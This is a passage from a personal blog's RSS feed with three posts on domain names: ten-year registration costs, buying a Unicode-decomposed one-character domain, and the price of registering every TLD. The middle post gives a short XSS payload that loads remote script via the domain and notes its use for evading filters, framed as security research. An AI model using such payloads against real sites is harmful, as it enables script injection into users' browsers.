<p>It doesn't seem to be receiving any updates. I've tried contacting them to see if any improvements are planned, but didn't receive a reply. You can't set your own nameservers, nor can you add MX records or anything useful like that.</p>

<p>The cheapest fully functional domain which you can register for a decade appears to be <a href="https://www.sav.com"><code>.cyou</code> from Sav.com</a> at about £23 (US$27.60).</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2022/08/Screenshot-2022-08-25-at-18-02-42-Your-Cart.png" alt="Screenshot showing the domain cost at sav.com." width="675" height="309" class="aligncenter size-full wp-image-43466">

<p>Up next is <a href="https://porkbun.com/checkout/search?q=asdfsdadsfadsf.stream"><code>.stream</code> from Porkbun</a> - you can buy a 10 year domain for ~£30 (US$35.60).</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2022/08/Screenshot-2022-08-25-at-18-05-31-porkbun.com-An-oddly-satisfying-experience.png" alt="Screenshot showing the price." width="937" height="335" class="aligncenter size-full wp-image-43467">

<p>As pointed out on the <a href="https://news.ycombinator.com/item?id=32797286#32799446">HackerNews discussion</a> on this post, you can <a href="https://www.dynadot.com/domain/in.html">register a <code>.in</code> domain for 10 years for £37</a>.</p>

<p>So, there you have it. For between £23 - £40 you can buy a <em>useful</em> domain name which will stay registered to you for a decade. If you can find anything cheaper - please let me know in the comments.</p>

<p>Of course, paying for <em>hosting</em> for a decade is a different matter!</p>

<div id="footnotes" role="doc-endnotes">
<hr aria-label="Footnotes">
<ol start="0">

<li id="fn:ten">
<p>Do let me know if there are exceptions to this rule which are available to the general public.&nbsp;<a href="https://shkspr.mobi/blog/2022/09/whats-the-cheapest-domain-you-can-register-for-10-years/#fnref:ten" class="footnote-backref" role="doc-backlink">↩︎</a></p>
</li>

</ol>
</div>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=43463&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2022/09/whats-the-cheapest-domain-you-can-register-for-10-years/feed/</wfw:commentRss>
			<slash:comments>13</slash:comments>
		
		
			</item>
		<item>
		<title><![CDATA[Buying a single character domain - and 3 character FQDN - for £15]]></title>
		<link>https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/</link>
					<comments>https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#comments</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Sat, 15 Aug 2020 11:34:24 +0000</pubDate>
		<category><![CDATA[domains]]></category><category><![CDATA[hack]]></category><category><![CDATA[tld]]></category><category><![CDATA[unicode]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=36322</guid>

					<description><![CDATA[Short domains are useful for security testing. If you only have a limited number of characters, you need to be able to reference code on a remote server in as few characters as possible.  A few years ago, I tried to find a Minimum Viable XSS. The conclusion that I (and others) came to is that 20 characters is the bare minimum. But it requires you have a 2 character domain name on a 2-character…]]></description>
										<content:encoded><![CDATA[<p>Short domains are useful for security testing. If you only have a limited number of characters, you need to be able to reference code on a remote server in as few characters as possible.</p>

<p>A few years ago, I tried to find a <a href="https://shkspr.mobi/blog/2016/03/minimum-viable-xss/">Minimum Viable XSS</a>. The conclusion that I (<a href="https://jlajara.gitlab.io/web/2019/11/30/XSS_20_characters.html">and others</a>) came to is that 20 characters is the bare minimum. But it requires you have a 2 character domain name on a 2-character TLD. Something like <code>xy.uk</code></p>

<p>I don't think any 1- or 2-character domain names are available. If they're for sale, it will be at extortionate price. There are no Top-Level Domains shorter than 2 characters.</p>

<p>So, let's <em>cheat!</em></p>

<p>This is the story of how I bought a <em>single character</em> domain, and am able to reference it in 3 characters, for the cost of a round of drinks.</p>

<h2 id="brief-history"><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#brief-history">Brief History</a></h2>

<p>As I discussed in <a href="https://shkspr.mobi/blog/2018/11/domain-hacks-with-unusual-unicode-characters/">Domain hacks with unusual Unicode characters</a> - there are a bunch of single Unicode codepoints which are <a href="https://www.unicode.org/charts/normalization/">normalised to 2- or 3-character sequences</a>.</p>

<p>For example, <code>㎐</code> is the scientific symbol for Hertz. It is a single codepoint (U+3390). When your browser sees it in a domain name, it automatically splits it into the <code>H</code> and <code>z</code> characters. This is called decomposition.</p>

<p>Based on my count, there are about 90 symbols which decompose into 2 characters - for example <code>™</code>, <code>㏄</code>, <code>ǳ</code>.
There are about 35 symbols which decompose into 3 characters - for example <code>㎪</code>, <code>㍹</code>, <code>ﬃ</code>.</p>

<p>But, as mentioned, it is almost impossible to find a cheap 2- or 3-letter domain name.</p>

<p>There are, however, a couple of <em>four</em> character decompositions!</p>

<h2 id="quidquid-latine-dictum-sit-altum-videtur"><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#quidquid-latine-dictum-sit-altum-videtur"><span lang="la">Quidquid latine dictum sit, altum videtur</span></a></h2>

<p>The Romans didn't use a positional number system. The number 1 was Ⅰ, the number 2 was Ⅱ, the number 9 was Ⅸ.</p>

<p>But - look closely! The <code>Ⅰ</code> is not the English letter <code>I</code> - it is its own, separate, Unicode character <a href="https://www.compart.com/en/unicode/U+2160">(U+2160)</a>. And <code>Ⅱ</code> is <em>not</em> two <code>Ⅰ</code>s smushed together, it is <a href="https://www.compart.com/en/unicode/U+2161">(U+2161)</a>.</p>

<p>When decomposed, however, they return to English letters.</p>

<p>What's the <em>longest</em> Roman numeral captured in a single codepoint?</p>

<p>The number 8 is <code>Ⅷ</code> <a href="https://www.compart.com/en/unicode/U+2167">(U+2167)</a> - which decomposes to V I I I. Four characters!</p>

<blockquote><p>but apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, public health, <strong>and a number system suitable for character decomposition</strong> what have the Romans ever done for us?</p></blockquote>

<h2 id="tldr-tld"><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#tldr-tld">tl;dr TLD</a></h2>

<p>There are a number of Top-Level Domains which can also be represented by a single character.</p>

<p>For example, Australia's TLD <code>.au</code> can be represented by the Astronomical Unit sign <code>㍳</code> <a href="https://www.compart.com/en/unicode/U+3373">(U+3373)</a>.</p>

<p>Most of those domains were expensive, or unavailable. But I found one which was both cheap and available.</p>

<iframe title="Monty Python - Finland (Official Lyric Video)" width="620" height="349" src="https://www.youtube.com/embed/baHsoEAAMZU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen=""></iframe>

<p>Yes! The <a href="https://en.wikipedia.org/wiki/Orthographic_ligature">orthographic ligature</a> of <code>ﬁ</code> decomposes to <code>f</code> and <code>i</code>. That's the TLD for Finland.</p>

<p>I was able to register a Finnish domain on <a href="https://gandi.link/f/0e14fbd6">Gandi</a> for £15.</p>

<h2 id="%e2%85%b7-%ef%ac%81"><a href="https://Ⅷ.ﬁ/"><code>Ⅷ.ﬁ</code></a><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#%e2%85%b7-%ef%ac%81">🔗</a></h2>

<p>That's Roman Numeral Eight (U+2167), dot (U+002E), Latin Small Ligature Fi (U+FB01).</p>

<h2 id="is-this-useful"><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#is-this-useful">Is this useful?</a></h2>

<p>This gives me a Minimum Viable XSS in <em>eighteen</em> characters!</p>

<ul>
<li><code>&lt;script src=//Ⅷ.ﬁ&gt;</code></li>
</ul>

<p>I'm <em>pretty</em> sure that's the shortest possible sequence!</p>

<p>Or, for loading remote resources in 15 characters:</p>

<ul>
<li><code>&lt;img src=//Ⅷ.ﬁ&gt;</code></li>
</ul>

<p>There aren't many sites which are secured <em>only</em> by using a restricted character count - thankfully! But shrunk domains can also be useful for evading all sorts of filters.</p>

<h2 id="other-domains-are-available"><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#other-domains-are-available">Other domains are available</a></h2>

<p>There's one other 4-character decomposition available - see if you can find it!<br>
There are a few shrinkable TLDs which still have some of the 2- and 3-character domains available, but they are extortionately priced.</p>

<p>If you do grab one of these, and make something cool with it, please let me know.</p>

<h2 id="support-this-blog"><a href="https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/#support-this-blog">Support this blog</a></h2>

<p>If you've learned something from my blog posts, here's how you can return the favour:</p>

<ul>
<li><a href="https://amzn.to/340wTFk">Buy me something nice from my Amazon wishlist</a></li>
<li><a href="https://ko-fi.com/edent">Support me on Ko-Fi</a></li>
</ul>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=36322&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2020/08/buying-a-single-character-domain-and-3-character-fqdn-for-15/feed/</wfw:commentRss>
			<slash:comments>19</slash:comments>
		
		
			</item>
		<item>
		<title><![CDATA[How much would it cost to buy every domain name?]]></title>
		<link>https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/</link>
					<comments>https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#comments</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Sun, 19 May 2019 11:18:38 +0000</pubDate>
		<category><![CDATA[domains]]></category><category><![CDATA[iana]]></category><category><![CDATA[internet]]></category><category><![CDATA[tld]]></category><category><![CDATA[web]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=32092</guid>

					<description><![CDATA[The ridiculous proliferation of TLDs (Top Level Domains) continues unabated.  I wondered how much you&#039;d have to spend to secure your name on every TLD.  tl;dr;tld  Over $300,000!  (Roughly €280.000 / £245,000.)  But...  This estimate is pretty rough. A few caveats:   This only covers one version of your domain name - it doesn&#039;t cover misspellings. I&#039;ve assumed a single year of registration. Some d…]]></description>
										<content:encoded><![CDATA[<p>The <a href="https://shkspr.mobi/blog/2016/07/iana-insanity-or-how-i-learned-to-stop-worrying-and-love-the-new-internet/">ridiculous proliferation of TLDs</a> (Top Level Domains) continues unabated.  I wondered how much you'd have to spend to secure your name on <em>every</em> TLD.</p>

<h2 id="tldrtld"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#tldrtld">tl;dr;tld</a></h2>

<p>Over $300,000!</p>

<p>(Roughly €280.000 / £245,000.)</p>

<h2 id="but"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#but">But...</a></h2>

<p>This estimate is pretty rough. A few caveats:</p>

<ol>
<li>This only covers one version of your domain name - it doesn't cover misspellings.</li>
<li>I've assumed a single year of registration. Some domains give discounts for multiple years, or only offer multi-year registration.</li>
<li>Some TLDs have a discount for the first year.</li>
<li>Some TLDs only let you register if you're a citizen of that country, or have a business presence there. I've assumed that you do.</li>
<li>There are several TLDs which only let you register using a specific language for your domain - for example Chinese domains require Chinese characters. I've assumed that you're buying one of those as well.</li>
<li>Some TLDs can't be registered - for example .gov, .mil, .int - they have been excluded.</li>
<li>Bulk domain purchases may result in a discount. I'm using retail pricing rather than wholesale.</li>
<li>Depending on where you live, different countries' prices and tax rates may vary considerably.</li>
</ol>

<h2 id="data"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#data">Data</a></h2>

<p>It is surprisingly hard to find what the base cost is of all the domains. There are currently <a href="https://data.iana.org/TLD/tlds-alpha-by-domain.txt">over 1,500 possible TLDs</a>!</p>

<p>The number of domains available to register is even higher because some TLDs allow for 2nd level registration. For example, .org.uk, .co.uk, or .co.in, etc.</p>

<p>The Registry which controls a set of specific TLDs is more-or-less free to set any pricing policy they want.  I couldn't find any official data for those policies. If you do know, please leave a comment.</p>

<h2 id="data-sources"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#data-sources">Data Sources</a></h2>

<p>The Registrar - the entity which sells you the domain - is free to set its own pricing.  There are many retailers of domain names - let's look at some popular ones.</p>

<h2 id="cloudflare"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#cloudflare">Cloudflare</a></h2>

<p>Some, like <a href="https://www.cloudflare.com/products/registrar/">Cloudflare</a> promise to only charge you the wholesale cost, but refuse to tell you what the costs are unless you have a domain to transfer to them. <a href="https://www.cloudflare.com/tld-policies/">They also only support 200 TLDs</a>.</p>

<h3 id="google"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#google">Google</a></h3>

<p><a href="https://web.archive.org/web/20190513031304/https://support.google.com/domains/answer/6010092?hl=en">Google supports 273 TLDs</a> - but they do list prices for each one.</p>

<p>If you were to register a domain on all 273 TLDs it would cost you <strong><code>£8,550</code> per year!</strong></p>

<h3 id="gandi"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#gandi">Gandi</a></h3>

<p>I looked at <a href="https://www.gandi.net/en/domain/tld?prefix=a">Gandi - who provide a full price list</a>. Sadly, it is in PDF, so I had to use <a href="https://tabula.technology/">Tabula</a> to extract the data.  They sell 747 TLDs - from .abogado (£42) to .yt (£12).</p>

<p>If you bought every TLD that Gandi sell, it would cost you a whopping <strong><code>£92,131.08</code>!</strong></p>

<p>Fun fact: Gandi's most expensive domain is <code>.makeup</code> for <code>£7,146.76</code>.</p>

<h3 id="101domains"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#101domains">101domains</a></h3>

<p>According to <a href="https://tld-list.com/registrars/">TLD List</a>, the registrar with the most TLDs offered is 101domains with 1,836 possible names!</p>

<p>There is an API available for 101domains pricelist! You can parse through it alphabetically using:</p>

<p><code>https://www.101domain.com/price_list_service.json?o=B</code></p>

<p>And grab the International Domain Names with:</p>

<p><code>https://www.101domain.com/price_list_service.json?o=IDNs</code></p>

<p>Sadly, it doesn't list all domains on one call, so you have to grab each one. It only provides prices in USD.</p>

<p>But, when you add up all the domain names provided, the total cost to register them all would be <strong><code>$311,852.42</code></strong>!</p>

<p>The most expensive TLD on 101domains is <a href="https://www.101domain.com/hoteles.htm"><code>.hoteles</code></a> for <code>$65,000</code>!</p>

<h2 id="whats-the-point"><a href="https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/#whats-the-point">What's the point?</a></h2>

<p>It's unlikely that anyone would actually go ahead and do this. You'd need more money than sense if you wanted to protect your brand across every domain. It's probably cheaper to register a name once and then issue legal threats against anyone registering your name on an obscure TLD.</p>

<p>It <a href="https://newgtlds.icann.org/en/applicants/global-support/faqs/faqs-en">costs $185,000 to own your own TLD</a>. Plus you also have to show that you have the resources to maintain it.</p>

<p>That's exactly what Sony did. They bought the <code>.xperia</code> TLD - presumably so that they wouldn't have to register domains in every country.  But, <a href="https://blog.benjojo.co.uk/post/the-death-of-a-tld">as Ben Cox pointed out</a>, they then dropped it.</p>

<blockquote class="social-embed" id="social-embed-1022503156180234240" lang="en" itemscope="" itemtype="https://schema.org/SocialMediaPosting"><header class="social-embed-header" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><a href="https://twitter.com/Benjojo12" class="social-embed-user" itemprop="url"><img class="social-embed-avatar social-embed-avatar-circle" src="data:image/webp;base64,UklGRuABAABXRUJQVlA4INQBAACwCgCdASowADAAPrVOnEonJKKhrjv7MOAWiWkAEgV9+3gTno+hlHZzvB3e9rFqE6jmMoDYBuCFWaNrZ0gfjSeoxNjTULoY+rt0VO3NmryrKWQ+P+shJE2iq+aUZBYAAP7yk/H3P+FL7uClDK2HXeQYRBN++i+q36UpJhe36jZhX19dYzOKrZKfnErffi7s96MZ0DHjrr8Ph0eb3q2VgCp0qfMRRHwEV2y8BrZAx8rC3u0x0wqeTu3FPFVu59sAQ5NPqTe2kaW+8b3YNQQZIEPCVF5AI0iJz1yVTGlSNPKYhe7sesF38Ndu30xwArksYSQdnfvxLZvowVLMZccAzo5gdq2NT80DThKqTjk53CAJCOB8oEjDwYfx6cad96jyFboqyAJ81k2StWAdl9S66eIkkC8L6OZLpCPyXNvOIys1DP4l0D7hbeJ32oNO+q56d9IrS7mUvS0d7AM23kR7k7zcsPNIEr1dGklsVWqeIVN2FG7Yol4brOvnZHvAh9Hkvn2ZcTlBJng+XFEdmT0Wx8y6xMZ87BvcS5q+VHhUCX+ALyvAK1Uf7A+Z0HB6PYUC43QJIF1UYv7jH6ot0uRR4XmTDO4Rqpqx+RZt8m4gmMzTIQWIAAA=" alt="" itemprop="image"><div class="social-embed-user-names"><p class="social-embed-user-names-name" itemprop="name">Ben Cox (EOL @benjojo@benjojo.co.uk)</p>@Benjojo12</div></a><img class="social-embed-logo" alt="Twitter" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%0Aaria-label%3D%22Twitter%22%20role%3D%22img%22%0AviewBox%3D%220%200%20512%20512%22%3E%3Cpath%0Ad%3D%22m0%200H512V512H0%22%0Afill%3D%22%23fff%22%2F%3E%3Cpath%20fill%3D%22%231d9bf0%22%20d%3D%22m458%20140q-23%2010-45%2012%2025-15%2034-43-24%2014-50%2019a79%2079%200%2000-135%2072q-101-7-163-83a80%2080%200%200024%20106q-17%200-36-10s-3%2062%2064%2079q-19%205-36%201s15%2053%2074%2055q-50%2040-117%2033a224%20224%200%2000346-200q23-16%2040-41%22%2F%3E%3C%2Fsvg%3E"></header><section class="social-embed-text" itemprop="articleBody">Sony deleted a TLD, a whole TLD.<br><br>This is a strange future. <a href="https://twitter.com/ianawhois/status/1020694903033073665">x.com/ianawhois/stat…</a><blockquote class="social-embed" id="social-embed-1020694903033073665" lang="en" itemscope="" itemtype="https://schema.org/SocialMediaPosting"><header class="social-embed-header" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><a href="https://twitter.com/ianawhois" class="social-embed-user" itemprop="url"><img class="social-embed-avatar social-embed-avatar-circle" src="data:image/webp;base64,UklGRr4AAABXRUJQVlA4ILIAAABQBgCdASowADAAPrVGn0onI6KhtVK6qOAWiWcAyZBAAMl5qhtXF20/U9BnyFHkST/sbd92xM44BG2TkAD+9GvpUXJ+inp/RDNi4C+6VLh99466BSdXNY/zeNX5LqRGlX+ar7t8jaErZ2AbIYoodfjlzlm1swwOHJ8uHcAILkWABQeRy2SmgIdXXGZWwHcinsHMxqbZqzcURlghjqsPU/ZfACOECwS5f9IFZo61mn9VFwAA" alt="" itemprop="image"><div class="social-embed-user-names"><p class="social-embed-user-names-name" itemprop="name">IANA whois updates</p>@ianawhois</div></a><img class="social-embed-logo" alt="Twitter" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%0Aaria-label%3D%22Twitter%22%20role%3D%22img%22%0AviewBox%3D%220%200%20512%20512%22%3E%3Cpath%0Ad%3D%22m0%200H512V512H0%22%0Afill%3D%22%23fff%22%2F%3E%3Cpath%20fill%3D%22%231d9bf0%22%20d%3D%22m458%20140q-23%2010-45%2012%2025-15%2034-43-24%2014-50%2019a79%2079%200%2000-135%2072q-101-7-163-83a80%2080%200%200024%20106q-17%200-36-10s-3%2062%2064%2079q-19%205-36%201s15%2053%2074%2055q-50%2040-117%2033a224%20224%200%2000346-200q23-16%2040-41%22%2F%3E%3C%2Fsvg%3E"></header><section class="social-embed-text" itemprop="articleBody">IANA whois: deleted TLD XPERIA <a href="http://www.iana.org/domains/root/db/xperia.html">iana.org/domains/root/d…</a></section><hr class="social-embed-hr"><footer class="social-embed-footer"><a href="https://twitter.com/ianawhois/status/1020694903033073665"><span aria-label="58 likes" class="social-embed-meta">❤️ 58</span><span aria-label="0 replies" class="social-embed-meta">💬 0</span><span aria-label="14 reposts" class="social-embed-meta">🔁 14</span><time datetime="2018-07-21T15:40:03.000Z" itemprop="datePublished">15:40 - Sat 21 July 2018</time></a></footer></blockquote></section><hr class="social-embed-hr"><footer class="social-embed-footer"><a href="https://twitter.com/Benjojo12/status/1022503156180234240"><span aria-label="509 likes" class="social-embed-meta">❤️ 509</span><span aria-label="11 replies" class="social-embed-meta">💬 11</span><span aria-label="0 reposts" class="social-embed-meta">🔁 0</span><time datetime="2018-07-26T15:25:24.000Z" itemprop="datePublished">15:25 - Thu 26 July 2018</time></a></footer></blockquote>

<p>So, $185k to run your own domain - or $300k to buy your domain name everywhere. Which would you choose?</p>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=32092&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2019/05/how-much-would-it-cost-to-buy-every-domain-name/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
